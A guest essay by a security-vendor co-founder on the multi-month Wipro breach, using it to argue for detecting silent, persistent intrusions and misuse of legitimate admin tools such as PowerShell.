GUEST ESSAY: How stealth, persistence allowed Wipro attacker to plunder supply chain

By Chris Gerritz

The recent network breach of Wipro, a prominent outsourcing company based in India, serves as a stunning reminder that digital transformation cuts two ways.

Our rising dependence on business systems that leverage cloud services and the gig economy to accomplish high-velocity innovation has led to a rise in productivity. However, the flip side is that we’ve also created fresh attack vectors at a rapid rate – exposures that are not being adequately addressed.

Related: Marriott suffers massive breach

We now know, thanks to reporting from cybersecurity blogger Brian Krebs, that the Wipro hack was a multi-month intrusion and likely the work of a nation-state backed threat actor. What’s more, the attackers reportedly were able to use Wipro as a jumping off point to infiltrate the networks of at least a dozen of Wipro’s customers.

Wipro issued a media statement, via its Economic Times division, acknowledging “potentially abnormal activity in a few employee accounts on our network due to an advanced phishing campaign . . . Upon learning of the incident, we promptly began an investigation, identified the affected users and took remedial steps to contain and mitigate any potential impact.”

Wipro did not provide many additional details. However, one has to wonder whether, beyond its customers, any of Wipro’s subsidiaries or supply-chain partners were targeted and successfully breached, as well.

Persistence pays off

Gerritz

Many businesses still believe the worst attack they can suffer is a near instantaneous loss, such as computers being locked or disabled for ransom. While ransomware attacks can cause material damage, another type of attack enterprises need to consider are ‘silent’ attacks, like the one Wipro and its customers experienced.

Silent, long-term attacks can remain hidden for months, even years, without being identified. These attacks can inflict a tremendous amount of harm if not detected and remediated. From the attacker’s point of view, a deep, persistent incursion results in numerous benefits. The intruder is able to:

•Use the compromised network to attack customers and partners

•Steal intellectual property

•Monitor competitive and operational business information

•Share access with someone else willing to pay for it

•Set the stage for a future cyber attack

The Wipro attack highlights the urgency for organizations to take steps to incorporate proactive and responsive elements within their security strategy, beyond the core prevention tools and controls like firewalls and traditional AV.

Borrowing tools

It would not surprise me if this attacker, once inside Wipro’s network, used tactics and techniques that have come into everyday use in advanced persistent threat (APT) types of hacks. One such go-to APT technique is to remotely leverage legit administrative tools to carry out malicious activities — under cover.

For instance, PowerShell is a command-line shell pervasively used in every Microsoft Windows-based network to make it convenient for system administrators to automate tasks and manage configurations across many endpoints and servers. PowerShell is commonly used in APT hacks to help the attacker move laterally, while hiding within the noise of normal day-to-day network activity.

Unfortunately, at the moment there is no generic defense a vendor can sell a company to stop this type of threat. The Wipro hack underscores why companies need to audit and validate tools, like PowerShell, and numerous others, on a continual basis. The goal should be for organizations to understand what ‘normal’ is in their network and be able to accurately and swiftly identify deviations from that normal baseline.

Reports like this are often the key to finding a long-term, persistent compromise within a network. The fact that your data is out there, in the public or digital underground, tends to lead the victim of a breach to recognize their data and realize they were the one breached.  When this type of situation occurs, a proactive effort to find the source of the breach must be initiated immediately with the goal of finding and stopping the source of the attack.

About the essayist: Chris Gerritz is the co-founder and CPO of Infocyte, a pioneer in forensics-based proactive cyber threat detection and instant incident response.

 

Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInEmail this to someone